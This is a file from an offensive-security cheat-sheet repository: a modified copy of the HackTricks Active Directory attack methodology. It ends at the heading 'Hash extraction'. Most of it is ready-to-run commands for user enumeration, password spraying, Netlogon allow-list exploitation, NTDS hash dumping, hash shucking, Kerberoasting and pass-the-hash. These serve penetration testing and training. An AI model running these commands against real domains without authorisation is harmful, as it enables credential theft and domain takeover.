daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (75019B)


      1 ---
      2 title: "Active Directory Methodology"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Active Directory Methodology
     14 
     15 ## Basic overview
     16 
     17 **Active Directory** serves as a foundational technology, enabling **network administrators** to efficiently create and manage **domains**, **users**, and **objects** within a network. It is engineered to scale, facilitating the organization of an extensive number of users into manageable **groups** and **subgroups**, while controlling **access rights** at various levels.
     18 
     19 The structure of **Active Directory** is comprised of three primary layers: **domains**, **trees**, and **forests**. A **domain** encompasses a collection of objects, such as **users** or **devices**, sharing a common database. **Trees** are groups of these domains linked by a shared structure, and a **forest** represents the collection of multiple trees, interconnected through **trust relationships**, forming the uppermost layer of the organizational structure. Specific **access** and **communication rights** can be designated at each of these levels.
     20 
     21 Key concepts within **Active Directory** include:
     22 
     23 1. **Directory** – Houses all information pertaining to Active Directory objects.
     24 2. **Object** – Denotes entities within the directory, including **users**, **groups**, or **shared folders**.
     25 3. **Domain** – Serves as a container for directory objects, with the capability for multiple domains to coexist within a **forest**, each maintaining its own object collection.
     26 4. **Tree** – A grouping of domains that share a common root domain.
     27 5. **Forest** – The pinnacle of organizational structure in Active Directory, composed of several trees with **trust relationships** among them.
     28 
     29 **Active Directory Domain Services (AD DS)** encompasses a range of services critical for the centralized management and communication within a network. These services comprise:
     30 
     31 1. **Domain Services** – Centralizes data storage and manages interactions between **users** and **domains**, including **authentication** and **search** functionalities.
     32 2. **Certificate Services** – Oversees the creation, distribution, and management of secure **digital certificates**.
     33 3. **Lightweight Directory Services** – Supports directory-enabled applications through the **LDAP protocol**.
     34 4. **Directory Federation Services** – Provides **single-sign-on** capabilities to authenticate users across multiple web applications in a single session.
     35 5. **Rights Management** – Assists in safeguarding copyright material by regulating its unauthorized distribution and use.
     36 6. **DNS Service** – Crucial for the resolution of **domain names**.
     37 
     38 For a more detailed explanation check: [**TechTerms - Active Directory Definition**](https://techterms.com/definition/active_directory)
     39 
     40 ### **Kerberos Authentication**
     41 
     42 To learn how to **attack an AD** you need to **understand** really good the **Kerberos authentication process**.\
     43 [**Read this page if you still don't know how it works.**](/hacktricks/windows-hardening/active-directory-methodology/kerberos-authentication)
     44 
     45 ## Cheat Sheet
     46 
     47 You can take a lot to [https://wadcoms.github.io/](https://wadcoms.github.io) to have a quick view of which commands you can run to enumerate/exploit an AD.
     48 
     49 > [!WARNING]
     50 > Kerberos communication normally **requires a fully qualified domain name (FQDN)** so that the client can obtain a ticket for the correct SPN. Accessing a machine by IP address commonly falls back to NTLM instead of Kerberos.
     51 
     52 ## Recon Active Directory (No creds/sessions)
     53 
     54 If you just have access to an AD environment but you don't have any credentials/sessions you could:
     55 
     56 - **Pentest the network:**
     57   - Scan the network, find machines and open ports, and try to **exploit vulnerabilities** or **extract credentials** from them (for example, [printers can be very interesting targets](/hacktricks/windows-hardening/active-directory-methodology/ad-information-in-printers)).
     58   - Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.
     59     - `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
     60   - Take a look to the General [**Pentesting Methodology**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-methodology.md) to find more information about how to do this.
     61 - **Check for null and Guest access on smb services** (this won't work on modern Windows versions):
     62   - `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
     63   - `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
     64   - `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
     65   - A more detailed guide on how to enumerate a SMB server can be found here:
     66 
     67 
     68 [Pentesting Smb](/hacktricks/network-services-pentesting/pentesting-smb/overview)
     69 
     70 - **Enumerate Ldap**
     71   - `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
     72   - A more detailed guide on how to enumerate LDAP can be found here (pay **special attention to the anonymous access**):
     73 
     74 
     75 [Pentesting Ldap](/hacktricks/network-services-pentesting/pentesting-ldap)
     76 
     77 - **Poison the network**
     78   - Gather credentials [**impersonating services with Responder**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
     79   - Access host by [**abusing the relay attack**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
     80   - Gather credentials **exposing** [**fake UPnP services with evil-S**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
     81 - [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html):
     82   - Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
     83   - If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
     84   - Tools:
     85     - [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
     86     - [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
     87 
     88 ### User enumeration
     89 
     90 - **Anonymous SMB/LDAP enum:** Check the [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/index.html) and [**pentesting LDAP**](/hacktricks/network-services-pentesting/pentesting-ldap) pages.
     91 - **Kerbrute enum**: When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC_ERR_PREAUTH_REQUIRED_, indicating that the user is required to perform pre-authentication.
     92 - **No Authentication against MS-NRPC**: Using auth-level = 1 (No authentication) against the MS-NRPC (Netlogon) interface on domain controllers. The method calls the `DsrGetDcNameEx2` function after binding MS-NRPC interface to check if the user or computer exists without any credentials. The [NauthNRPC](https://github.com/sud0Ru/NauthNRPC) tool implements this type of enumeration. The research can be found [here](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/22190247/A-journey-into-forgotten-Null-Session-and-MS-RPC-interfaces.pdf)<sup>[[11]](#references)</sup>
     93 
     94 ```bash
     95 ./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
     96 
     97 nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
     98 Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
     99 
    100 msf> use auxiliary/gather/kerberos_enumusers
    101 
    102 crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
    103 python3 nauth.py -t target -u users_file.txt #From https://github.com/sud0Ru/NauthNRPC
    104 ```
    105 
    106 - **OWA (Outlook Web Access) Server**
    107 
    108 If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper):
    109 
    110 ```bash
    111 ipmo C:\Tools\MailSniper\MailSniper.ps1
    112 # Get info about the domain
    113 Invoke-DomainHarvestOWA -ExchHostname [ip]
    114 # Enumerate valid users from a list of potential usernames
    115 Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt
    116 # Password spraying
    117 Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021
    118 # Get addresses list from the compromised mail
    119 Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
    120 ```
    121 
    122 > [!WARNING]
    123 > You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names)  and this one ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
    124 >
    125 > However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) to generate potential valid usernames.
    126 
    127 ### Netlogon vulnerable-channel allow-list abuse (Onelogon)
    128 
    129 Even after **Zerologon** is patched on the DC, explicitly allow-listed accounts can still be exposed to **legacy/vulnerable Netlogon secure-channel behavior**. The risky configuration is the GPO **`Domain controller: Allow vulnerable Netlogon secure channel connections`** or the matching registry value **`HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\VulnerableChannelAllowList`**.
    130 
    131 That value is an **SDDL security descriptor** (see [Security Descriptors](/hacktricks/windows-hardening/active-directory-methodology/security-descriptors)). Any account or group granted the relevant ACE in the DACL can be targeted. For example, `O:BAG:BAD:(A;;RC;;;WD)` effectively allow-lists **Everyone**.
    132 
    133 Practical operator workflow:
    134 
    135 1. **Identify allow-listed principals** by checking both **SYSVOL/GPO** and the **live DC registry**.
    136 2. **Resolve SIDs** found in the SDDL to real AD users/computers and prioritize **DC machine accounts**, **trust accounts**, and other privileged machines.
    137 3. Repeatedly attempt **MS-NRPC / Netlogon authentication** as the allow-listed account.
    138 4. After a successful guess, abuse **Netlogon password-setting** to reset the target account password (the public PoC sets it to an empty string).<sup>[[9]](#references)[[10]](#references)</sup>
    139 
    140 Quick triage / lab examples from the public artifact:
    141 
    142 ```bash
    143 # Enumerate allow-listed accounts (scanner requires privileged registry access on the DC)
    144 poetry run scan --dc-ip <DC_IP> --username <USER> --password <PASSWORD>
    145 
    146 # Meet-in-the-middle attack against an allow-listed account
    147 poetry run onelogon --dc-ip <DC_IP> --dc-name <DC_HOSTNAME> --username '<TARGET_ACCOUNT>'
    148 
    149 # Faster 24-bit brute force when you control another computer account
    150 poetry run onelogon --dc-ip <DC_IP> --dc-name <DC_HOSTNAME> --username '<TARGET_ACCOUNT>' \
    151   --comp-username '<COMP_ACCOUNT>' --comp-pass '<COMP_PASSWORD>'
    152 ```
    153 
    154 Notes:
    155 
    156 - The **scanner** is useful because the effective allow-list may exist in **SYSVOL**, in the **registry**, or in both.
    157 - The exploit path itself is important because it **does not require Domain Admin privileges** once a vulnerable account has been identified.
    158 - Compromising a **Domain Controller machine account** such as `DC$` is especially dangerous because resetting that password can directly enable broader **AD takeover** paths.
    159 - **Brute-force feasibility** depends on the mode: the public artifact describes a meet-in-the-middle approach, a **24-bit** brute force when another computer account is available, and slower **32-bit** variants.
    160 
    161 Detection / hardening notes:
    162 
    163 - Audit the allow-list policy and remove anything except temporary, explicitly required compatibility exceptions.
    164 - Monitor DC **System** events **5827/5828/5829/5830/5831** to catch vulnerable Netlogon connections being denied, discovered, or explicitly allowed by policy.
    165 - Treat accounts in `VulnerableChannelAllowList` as **high-risk** until the legacy dependency is removed.
    166 
    167 ### Knowing one or several usernames
    168 
    169 Ok, so you know you have already a valid username but no passwords... Then try:
    170 
    171 - [**ASREPRoast**](/hacktricks/windows-hardening/active-directory-methodology/asreproast): If a user **doesn't have** the attribute _DONT_REQ_PREAUTH_ you can **request a AS_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
    172 - [**Password Spraying**](/hacktricks/windows-hardening/active-directory-methodology/password-spraying): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!).
    173   - Note that you can also **spray OWA servers** to try to get access to the users mail servers.
    174 
    175 
    176 [Password Spraying](/hacktricks/windows-hardening/active-directory-methodology/password-spraying)
    177 
    178 ### LLMNR/NBT-NS Poisoning
    179 
    180 You might be able to **obtain** some challenge **hashes** to crack **poisoning** some protocols of the **network**:
    181 
    182 
    183 [Spoofing Llmnr Nbt Ns Mdns Dns And Wpad And Relay Attacks](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
    184 
    185 ### NTLM Relay
    186 
    187 Active Directory enumeration provides usernames, email identifiers and naming patterns, candidate hosts, and services that may be coerced into authenticating. Use that context to identify viable NTLM [**relay attacks**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) and potential paths into the AD environment.
    188 
    189 ### NetExec workspace-driven recon & relay posture checks
    190 
    191 - Use **`nxcdb` workspaces** to keep AD recon state per engagement: `workspace create <name>` spawns per-protocol SQLite DBs under `~/.nxc/workspaces/<name>` (smb/mssql/winrm/ldap/etc). Switch views with `proto smb|mssql|winrm` and list gathered secrets with `creds`. Manually purge sensitive data when done: `rm -rf ~/.nxc/workspaces/<name>`.<sup>[[6]](#references)</sup>
    192 - Quick subnet discovery with **`netexec smb <cidr>`** surfaces **domain**, **OS build**, **SMB signing requirements**, and **Null Auth**. Members showing `(signing:False)` are **relay-prone**, while DCs often require signing.
    193 - Generate **hostnames in /etc/hosts** straight from NetExec output to ease targeting:
    194 
    195 ```bash
    196 netexec smb 10.2.10.0/24 --generate-hosts-file hosts
    197 cat hosts /etc/hosts | sponge /etc/hosts
    198 ```
    199 
    200 - When **SMB relay to the DC is blocked** by signing, still probe **LDAP** posture: `netexec ldap <dc>` highlights `(signing:None)` / weak channel binding. A DC with SMB signing required but LDAP signing disabled remains a viable **relay-to-LDAP** target for abuses like **SPN-less RBCD**.
    201 
    202 ### Client-side printer credential leaks → bulk domain credential validation
    203 
    204 - Printer/web UIs sometimes **embed masked admin passwords in HTML**. Viewing source/devtools can reveal cleartext (e.g., `<input value="<password>">`), allowing Basic-auth access to scan/print repositories.
    205 - Retrieved print jobs may contain **plaintext onboarding docs** with per-user passwords. Keep pairings aligned when testing:<sup>[[6]](#references)</sup>
    206 
    207 ```bash
    208 cat IT_Procedures.txt | grep Username: | cut -d' ' -f2 > usernames
    209 cat IT_Procedures.txt | grep Password: | cut -d' ' -f3 > passwords
    210 netexec smb <dc> -u usernames -p passwords --no-bruteforce --continue-on-success
    211 ```
    212 
    213 ### Steal NTLM Creds
    214 
    215 If you can **access other PCs or shares** with the **null or guest user** you could **place files** (like a SCF file) that if somehow accessed will t**rigger an NTLM authentication against you** so you can **steal** the **NTLM challenge** to crack it:
    216 
    217 
    218 [Places To Steal Ntlm Creds](/hacktricks/windows-hardening/ntlm/places-to-steal-ntlm-creds)
    219 
    220 ### Hash Shucking & NT-Candidate Attacks
    221 
    222 **Hash shucking** treats every NT hash you already possess as a candidate password for other, slower formats whose key material is derived directly from the NT hash. Instead of brute-forcing long passphrases in Kerberos RC4 tickets, NetNTLM challenges, or cached credentials, you feed the NT hashes into Hashcat’s NT-candidate modes and let it validate password reuse without ever learning the plaintext. This is especially potent after a domain compromise where you can harvest thousands of current and historical NT hashes.<sup>[[5]](#references)</sup>
    223 
    224 Use shucking when:
    225 
    226 - You have an NT corpus from DCSync, SAM/SECURITY dumps, or credential vaults and need to test for reuse in other domains/forests.
    227 - You capture RC4-based Kerberos material (`$krb5tgs$23$`, `$krb5asrep$23$`), NetNTLM responses, or DCC/DCC2 blobs.
    228 - You want to quickly prove reuse for long, uncrackable passphrases and immediately pivot via Pass-the-Hash.
    229 
    230 The technique **does not work** against encryption types whose keys are not the NT hash (e.g., Kerberos etype 17/18 AES). If a domain enforces AES-only, you must revert to the regular password modes.
    231 
    232 #### Building an NT hash corpus
    233 
    234 - **DCSync/NTDS** – Use `secretsdump.py` with history to grab the largest possible set of NT hashes (and their previous values):
    235 
    236   ```bash
    237   secretsdump.py <domain>/<user>@<dc_ip> -just-dc-ntlm -history -user-status -outputfile smoke_dump
    238   grep -i ':::' smoke_dump.ntds | awk -F: '{print $4}' | sort -u > nt_candidates.txt
    239   ```
    240 
    241   History entries dramatically widen the candidate pool because Microsoft can store up to 24 previous hashes per account. For more ways to harvest NTDS secrets see:
    242 
    243 [Dcsync](/hacktricks/windows-hardening/active-directory-methodology/dcsync)
    244 
    245 - **Endpoint cache dumps** – `nxc smb <ip> -u <local_admin> -p <password> --local-auth --lsa` (or Mimikatz `lsadump::sam /patch`) extracts local SAM/SECURITY data and cached domain logons (DCC/DCC2). Deduplicate and append those hashes to the same `nt_candidates.txt` list.
    246 - **Track metadata** – Keep the username/domain that produced each hash (even if the wordlist contains only hex). Matching hashes tell you immediately which principal is reusing a password once Hashcat prints the winning candidate.
    247 - Prefer candidates from the same forest or a trusted forest; that maximizes the chance of overlap when shucking.
    248 
    249 #### Hashcat NT-candidate modes
    250 
    251 | Hash Type                                | Password Mode | NT-Candidate Mode |
    252 | ---------------------------------------- | ------------- | ----------------- |
    253 | Domain Cached Credentials (DCC)          | 1100          | 31500             |
    254 | Domain Cached Credentials 2 (DCC2)       | 2100          | 31600             |
    255 | NetNTLMv1 / NetNTLMv1+ESS                | 5500          | 27000             |
    256 | NetNTLMv2                                | 5600          | 27100             |
    257 | Kerberos 5 etype 23 AS-REQ Pre-Auth      | 7500          | _N/A_             |
    258 | Kerberos 5 etype 23 TGS-REP (Kerberoast) | 13100         | 35300             |
    259 | Kerberos 5 etype 23 AS-REP               | 18200         | 35400             |
    260 
    261 Notes:
    262 
    263 - NT-candidate inputs **must remain raw 32-hex NT hashes**. Disable rule engines (no `-r`, no hybrid modes) because mangling corrupts the candidate key material.
    264 - These modes are not inherently faster, but the NTLM keyspace (~30,000 MH/s on an M3 Max) is ~100× quicker than Kerberos RC4 (~300 MH/s). Testing a curated NT list is far cheaper than exploring the entire password space in the slow format.
    265 - Always run the **latest Hashcat build** (`git clone https://github.com/hashcat/hashcat && make install`) because modes 31500/31600/35300/35400 shipped recently.<sup>[[7]](#references)</sup>
    266 - There is currently no NT mode for AS-REQ Pre-Auth, and AES etypes (19600/19700) require the plaintext password because their keys are derived via PBKDF2 from UTF-16LE passwords, not raw NT hashes.
    267 
    268 #### Example – Kerberoast RC4 (mode 35300)
    269 
    270 1. Capture an RC4 TGS for a target SPN with a low-privileged user (see the Kerberoast page for details):
    271 
    272 [Kerberoast](/hacktricks/windows-hardening/active-directory-methodology/kerberoast)
    273 
    274    ```bash
    275    GetUserSPNs.py -dc-ip <dc_ip> -request <domain>/<user> -outputfile roastable_TGS
    276    ```
    277 
    278 2. Shuck the ticket with your NT list:
    279 
    280    ```bash
    281    hashcat -m 35300 roastable_TGS nt_candidates.txt
    282    ```
    283 
    284    Hashcat derives the RC4 key from each NT candidate and validates the `$krb5tgs$23$...` blob. A match confirms that the service account uses one of your existing NT hashes.
    285 
    286 3. Immediately pivot via PtH:
    287 
    288    ```bash
    289    nxc smb <dc_ip> -u roastable -H <matched_nt_hash>
    290    ```
    291 
    292    You can optionally recover the plaintext later with `hashcat -m 1000 <matched_hash> wordlists/` if needed.
    293 
    294 #### Example – Cached credentials (mode 31600)
    295 
    296 1. Dump cached logons from a compromised workstation:
    297 
    298    ```bash
    299    nxc smb <host_ip> -u localadmin -p '<password>' --local-auth --lsa > lsa_dump.txt
    300    ```
    301 
    302 2. Copy the DCC2 line for the interesting domain user into `dcc2_highpriv.txt` and shuck it:
    303 
    304    ```bash
    305    hashcat -m 31600 dcc2_highpriv.txt nt_candidates.txt
    306    ```
    307 
    308 3. A successful match yields the NT hash already known in your list, proving that the cached user is reusing a password. Use it directly for PtH (`nxc smb <dc_ip> -u highpriv -H <hash>`) or brute-force it in fast NTLM mode to recover the string.
    309 
    310 The exact same workflow applies to NetNTLM challenge-responses (`-m 27000/27100`) and DCC (`-m 31500`). Once a match is identified you can launch relay, SMB/WMI/WinRM PtH, or re-crack the NT hash with masks/rules offline.
    311 
    312 
    313 ## Enumerating Active Directory WITH credentials/session
    314 
    315 For this phase you need to have **compromised the credentials or a session of a valid domain account.** If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
    316 
    317 Before starting authenticated enumeration, understand the **Kerberos double-hop problem**.
    318 
    319 
    320 [Kerberos Double Hop Problem](/hacktricks/windows-hardening/active-directory-methodology/kerberos-double-hop-problem)
    321 
    322 ### Enumeration
    323 
    324 Compromising an account is a **major step toward assessing the domain**, because it enables authenticated **Active Directory enumeration**:
    325 
    326 Regarding [**ASREPRoast**](/hacktricks/windows-hardening/active-directory-methodology/asreproast) you can now find every possible vulnerable user, and regarding [**Password Spraying**](/hacktricks/windows-hardening/active-directory-methodology/password-spraying) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.
    327 
    328 - You could use the [**CMD to perform a basic recon**](/hacktricks/windows-hardening/basic-cmd-for-pentesters#domain-info)
    329 - You can also use [**powershell for recon**](../basic-powershell-for-pentesters/index.html) which will be stealthier
    330 - You can also [**use powerview**](/hacktricks/windows-hardening/basic-powershell-for-pentesters/powerview) to extract more detailed information
    331 - Another amazing tool for recon in an active directory is [**BloodHound**](/hacktricks/windows-hardening/active-directory-methodology/bloodhound). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc.
    332   - **Other automated AD enumeration tools are:** [**AD Explorer**](/hacktricks/windows-hardening/active-directory-methodology/bloodhound#ad-explorer)**,** [**ADRecon**](/hacktricks/windows-hardening/active-directory-methodology/bloodhound#adrecon)**,** [**Group3r**](/hacktricks/windows-hardening/active-directory-methodology/bloodhound#group3r)**,** [**PingCastle**](/hacktricks/windows-hardening/active-directory-methodology/bloodhound#pingcastle)**.**
    333 - [**DNS records of the AD**](/hacktricks/windows-hardening/active-directory-methodology/ad-dns-records) as they might contain interesting information.
    334 - A **tool with GUI** that you can use to enumerate the directory is **AdExplorer.exe** from **SysInternal** Suite.
    335 - You can also search in the LDAP database with **ldapsearch** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) for other methods.
    336 - If you are using **Linux**, you could also enumerate the domain using [**pywerview**](https://github.com/the-useless-one/pywerview).
    337 - You could also try automated tools as:
    338   - [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
    339   - [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
    340 - **Extracting all domain users**
    341 
    342   It's very easy to obtain all the domain usernames from Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). In Linux, you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` or `enum4linux -a -u "user" -p "password" <DC IP>`
    343 
    344 > Even if this Enumeration section looks small this is the most important part of all. Access the links (mainly the one of cmd, powershell, powerview and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.
    345 
    346 ### Predictable pre-created computer accounts -> gMSA password access
    347 
    348 Computer accounts staged for legacy joins can retain a predictable initial password. NetExec's `pre2k` module identifies the characteristic `userAccountControl` value `4128` (`WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD`) and attempts a Kerberos TGT with the first 14 characters of the lowercase computer name, without the trailing `$`. Treat this UAC value as a candidate selector rather than assuming that membership in **Pre-Windows 2000 Compatible Access** alone proves the password is weak.<sup>[[18]](#references)[[20]](#references)</sup>
    349 
    350 Use authenticated LDAP enumeration to test the candidates and save successful TGTs. `ALL=True` expands testing beyond objects with the default `4128` filter.<sup>[[18]](#references)</sup>
    351 
    352 ```bash
    353 netexec ldap dc.corp.local -u auditor -p 'Password!' -M pre2k
    354 netexec ldap dc.corp.local -u auditor -p 'Password!' -M pre2k -o ALL=True
    355 
    356 # Validate a candidate explicitly with Kerberos
    357 netexec ldap dc.corp.local -u 'APP01$' -p app01 -k
    358 ```
    359 
    360 A failed default/NTLM bind does **not** invalidate this finding: test with `-k`, an FQDN that resolves to the DC, and a clock synchronized with the KDC. Successful module runs write candidate lists and acquired ccaches below `~/.nxc/modules/pre2k/`.<sup>[[18]](#references)[[20]](#references)</sup>
    361 
    362 After compromising the computer principal, graph its nested group memberships and outbound rights. In particular, principals named in a gMSA's `msDS-GroupMSAMembership` security descriptor can read `msDS-ManagedPassword`; NetExec's `--gmsa` output shows the allowed principals and returns the current NT hash when the authenticating computer is authorized.<sup>[[19]](#references)[[20]](#references)</sup>
    363 
    364 ```bash
    365 # Enumerate gMSAs and their password readers with the initial user
    366 netexec ldap dc.corp.local -u auditor -p 'Password!' --gmsa
    367 
    368 # Re-query as the compromised computer through Kerberos
    369 netexec ldap dc.corp.local -u 'APP01$' -p app01 -k --gmsa
    370 ```
    371 
    372 Then evaluate the recovered gMSA like any other credential: inspect local/domain group membership, logon rights, SPNs, delegation, and reachable services before trying pass-the-hash. This ACL-based retrieval path is distinct from [Golden gMSA/dMSA](/hacktricks/windows-hardening/active-directory-methodology/golden-dmsa-gmsa), which derives managed passwords after KDS root-key compromise.<sup>[[20]](#references)</sup>
    373 
    374 ### Kerberoast
    375 
    376 Kerberoasting involves obtaining **TGS tickets** used by services tied to user accounts and cracking their encryption—which is based on user passwords—**offline**.
    377 
    378 More about this in:
    379 
    380 
    381 [Kerberoast](/hacktricks/windows-hardening/active-directory-methodology/kerberoast)
    382 
    383 ### Remote connection (RDP, SSH, FTP, Win-RM, etc.)
    384 
    385 Once you have obtained some credentials you could check if you have access to any **machine**. For that matter, you could use **CrackMapExec** to attempt connecting on several servers with different protocols, accordingly to your ports scans.
    386 
    387 ### Local Privilege Escalation
    388 
    389 If you have compromised credentials or a session as a regular domain user and can access **any machine in the domain**, look for a path to **escalate privileges locally and collect credentials**. Local administrator privileges may allow you to **dump other users' hashes** from memory (LSASS) and local storage (SAM).
    390 
    391 There is a complete page in this book about [**local privilege escalation in Windows**](../windows-local-privilege-escalation/index.html) and a [**checklist**](/hacktricks/windows-hardening/checklist-windows-privilege-escalation). Also, don't forget to use [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
    392 
    393 ### Current Session Tickets
    394 
    395 It's very **unlikely** that you will find **tickets** in the current user **giving you permission to access** unexpected resources, but you could check:
    396 
    397 ```bash
    398 ## List all tickets (if not admin, only current user tickets)
    399 .\Rubeus.exe triage
    400 ## Dump the interesting one by luid
    401 .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
    402 [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
    403 ```
    404 
    405 ### NTLM Relay
    406 
    407 With domain credentials or a user session, revisit NTLM [**relay attacks**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack): authenticated enumeration and coercion techniques can expose relay paths that were unavailable during unauthenticated reconnaissance.
    408 
    409 ### Looks for Creds in Computer Shares | SMB Shares
    410 
    411 Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
    412 
    413 [**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb/index.html#domain-shared-folders-search)
    414 
    415 ### Steal NTLM Creds
    416 
    417 If you can **access other PCs or shares** you could **place files** (like a SCF file) that if somehow accessed will t**rigger an NTLM authentication against you** so you can **steal** the **NTLM challenge** to crack it:
    418 
    419 
    420 [Places To Steal Ntlm Creds](/hacktricks/windows-hardening/ntlm/places-to-steal-ntlm-creds)
    421 
    422 ### CVE-2021-1675/CVE-2021-34527 PrintNightmare
    423 
    424 This vulnerability allowed any authenticated user to **compromise the domain controller**.
    425 
    426 
    427 [Printnightmare](/hacktricks/windows-hardening/active-directory-methodology/printnightmare)
    428 
    429 ## Privilege escalation on Active Directory WITH privileged credentials/session
    430 
    431 **For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
    432 
    433 ### Hash extraction
    434 
